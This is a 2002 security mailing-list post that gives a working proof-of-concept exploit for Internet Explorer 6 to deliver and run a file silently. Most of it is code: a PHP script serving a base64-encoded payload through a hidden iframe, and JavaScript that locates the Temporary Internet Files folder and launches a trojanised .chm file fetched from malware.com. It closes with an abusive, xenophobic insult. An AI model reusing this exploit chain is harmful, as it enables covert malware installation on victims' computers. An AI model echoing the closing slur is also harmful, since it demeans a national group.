Monday, August 12, 2002

Yet another silent delivery and installation of an executable on the
target computer using Internet Exlorer 6. This can be achieved by
reversing the following:

http://online.securityfocus.com/bid/5350

And:

HTM. In order to to achieve the required results as outlined in the
above, we must determine the location of the Temporary Internet File
[TIF] folders. This can only be achieved if we can physically open
up our file from within and read its location. Technically that can
only be achieved if we have a security dialogue prompt asking us for
permission. If we elect to open the file through acceptance of the
security warning dialogue, it is opened from within the TIF by
whatever program is associated with that file.

Okay:

Okay. HTM. HTM files are associated with Internet Explorer. We force
our *.htm file open via a combination of server `misconfiguration`
and our PHP 'package' as below:

<?
function malware()
{
header("Content-type: text/html");
header("Content-Disposition: attachment");
echo base64_decode(
'PGltZyBkeW5zcmM9Imh0dHA6Ly93d3cubWFsd2FyZS5jb20vbW'.
'Fsd2FyZS9tYWx3YXJlLmNobSIgd2lkdGg9MSBoZWlnaHQ9MT4N'.
'Cg0KPFNDUklQVD4NCg0KLy8gNy4wMi4wMiBodHRwOi8vd3d3Lm'.
'1hbHdhcmUuY29tDQoNCi8vIHlvdSBtYXkgY29uc2lkZXIgd3Jp'.
'dGluZyBzZXZlcmFsIGxpbmVzDQovLyBpbiBjYXNlIG1hbHdhcm'.
'UuY2htIGFycml2ZXMgYXMgWzFdIG9yIFsyXSBldGMNCg0KZnVu'.
'Y3Rpb24gbWFsd2FyZSgpDQp7DQpzPWRvY3VtZW50LlVSTDsNCn'.
'BhdGg9cy5zdWJzdHIoLTAscy5sYXN0SW5kZXhPZigiXFwiKSk7'.
'DQpwYXRoPXVuZXNjYXBlKHBhdGgpOw0KZG9jdW1lbnQud3JpdG'.
'UoJzxGT1JNIG5hbWU9Im1hbHdhcmUiIEFDVElPTj0iamF2YXNj'.
'cmlwdDp3aW5kb3cuc2hvd0hlbHAoZG9jdW1lbnQuZm9ybXNbMF'.
'0uZWxlbWVudHNbMF0udmFsdWUpIj4nKTsNCmRvY3VtZW50Lndy'.
'aXRlKCc8Zm9ybT48aW5wdXQgdHlwZT0iaGlkZGVuIiAgc2l6ZT'.
'0iNDAiIG1heGxlbmd0aD0iODAiIHZhbHVlPSInK3BhdGgrJ1xc'.
'bWFsd2FyZVsxXS5jaG0iPjwvZm9ybT4nKTsNCnNldFRpbWVvdX'.
'QoJ2RvY3VtZW50Lm1hbHdhcmUuc3VibWl0KCknLDEwMDAwKTsN'.
'CiB9IA0Kc2V0VGltZW91dCgibWFsd2FyZSgpIiwyNTAwKTsgIA'.
'0KPC9TQ1JJUFQ+DQogDQoNCg=='.'');}
{ malware(); }
PHP ?>

  <iframe src=<? echo $PHP_SELF ?> width=1 height=1>

Where our PHP 'package' contains our now run-of-the-mill scripting to
determine our TIF location and our old friend the trojanised *.chm
file as follows:

<img dynsrc="http://www.malware.com/malware/malware.chm" width=1
height=1>

<SCRIPT>

// 7.02.02 http://www.malware.com

function malware()
{
s=document.URL;
path=s.substr(-0,s.lastIndexOf(""));
path=unescape(path);
document.write('<FORM name="malware"
ACTION="javascript:window.showHelp(document.forms[0].elements
[0].value)">');
document.write('<form><input type="hidden" size="40" maxlength="80"
value="'+path+'malware[1].chm"></form>');
setTimeout('document.malware.submit()',10000);
 }
setTimeout("malware()",2500);
</SCRIPT>

note: file path for *.chm must be long as we are now operating off
the server and from within the TIF

What this does is generate the default security warning for *.htm
flles:

[screen shot: http://www.malware.com/malwarez.png 7KB]

Should we elect to open it, we are once again able to determine our
TIF location where our *.chm is now residing too and fire our
scripting to locate and call it.

[screen shot: http://www.malware.com/zerawlam.png 7KB]

Notes:

1. As indicated this is the reverse for :
http://online.securityfocus.com/bid/5350 . In this instance the
default is the security warning which should be disengaged to allow
this to fail.
2 Tested series of win98 machines, Internet Explorer 6.0.2600 and all
of its bandages
4. We anxiously await the release of Internet Explorer 6 SP1.

Special Note: would the gang of Nigerians who have taken up squatting
on these security mailing lists and who feel it is necessary to
continuously request our assistance with their multiple millions of
dollars every day, kindly fuck off and die. Thank you.

End Call

--
http://www.malware.com

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]